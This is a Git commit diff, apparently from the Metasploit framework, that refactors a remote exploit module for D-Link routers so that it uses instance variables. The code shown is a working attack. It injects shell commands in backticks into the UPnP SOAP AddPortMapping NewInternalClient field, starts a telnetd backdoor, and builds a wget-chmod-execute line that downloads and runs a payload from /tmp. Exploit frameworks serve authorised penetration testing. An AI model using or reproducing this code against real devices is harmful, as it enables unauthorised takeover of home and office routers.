Use instance variables

unstable
jvazquez-r7 2013-07-19 14:46:17 -05:00
parent e93eef4534
commit 4beea52449
1 changed files with 20 additions and 20 deletions

View File

@ -85,51 +85,51 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
new_portmapping_description = rand_text_alpha(8) @new_portmapping_descr = rand_text_alpha(8)
new_external_port = rand(65535) @new_external_port = rand(65535)
new_internal_port = rand(65535) @new_internal_port = rand(65535)
if target.name =~ /CMD/ if target.name =~ /CMD/
exploit_cmd(new_external_port, new_internal_port, new_portmapping_description) exploit_cmd
elsif target.name =~ /Telnet/ elsif target.name =~ /Telnet/
exploit_telnet(new_external_port, new_internal_port, new_portmapping_description) exploit_telnet
else else
exploit_mips(new_external_port, new_internal_port, new_portmapping_description) exploit_mips
end end
end end
def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description) def exploit_cmd
if not (datastore['CMD']) if not (datastore['CMD'])
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end end
cmd = payload.encoded cmd = payload.encoded
type = "add" type = "add"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
type = "delete" type = "delete"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
return return
end end
def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description) def exploit_telnet
telnetport = rand(65535) telnetport = rand(65535)
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}") vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
cmd = "telnetd -p #{telnetport}" cmd = "telnetd -p #{telnetport}"
type = "add" type = "add"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
type = "delete" type = "delete"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
return return
end end
def exploit_mips(new_external_port, new_internal_port, new_portmapping_description) def exploit_mips
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
@ -220,7 +220,7 @@ class Metasploit3 < Msf::Exploit::Remote
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}" cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
type = "add" type = "add"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end end
@ -236,13 +236,13 @@ class Metasploit3 < Msf::Exploit::Remote
register_file_for_cleanup("/tmp/#{filename}") register_file_for_cleanup("/tmp/#{filename}")
type = "delete" type = "delete"
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) res = request(cmd, type)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end end
end end
def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) def request(cmd, type)
uri = '/soap.cgi' uri = '/soap.cgi'
@ -256,14 +256,14 @@ class Metasploit3 < Msf::Exploit::Remote
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping" soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">" data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>" data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
data_cmd << "<NewLeaseDuration></NewLeaseDuration>" data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>" data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
data_cmd << "<NewEnabled>1</NewEnabled>" data_cmd << "<NewEnabled>1</NewEnabled>"
data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>" data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
data_cmd << "<NewRemoteHost></NewRemoteHost>" data_cmd << "<NewRemoteHost></NewRemoteHost>"
data_cmd << "<NewProtocol>TCP</NewProtocol>" data_cmd << "<NewProtocol>TCP</NewProtocol>"
data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>" data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
data_cmd << "</m:AddPortMapping>" data_cmd << "</m:AddPortMapping>"
else else
#we should clean it up ... otherwise we are not able to exploit it multiple times #we should clean it up ... otherwise we are not able to exploit it multiple times
@ -271,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping" soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">" data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>" data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
data_cmd << "</m:DeletePortMapping>" data_cmd << "</m:DeletePortMapping>"
end end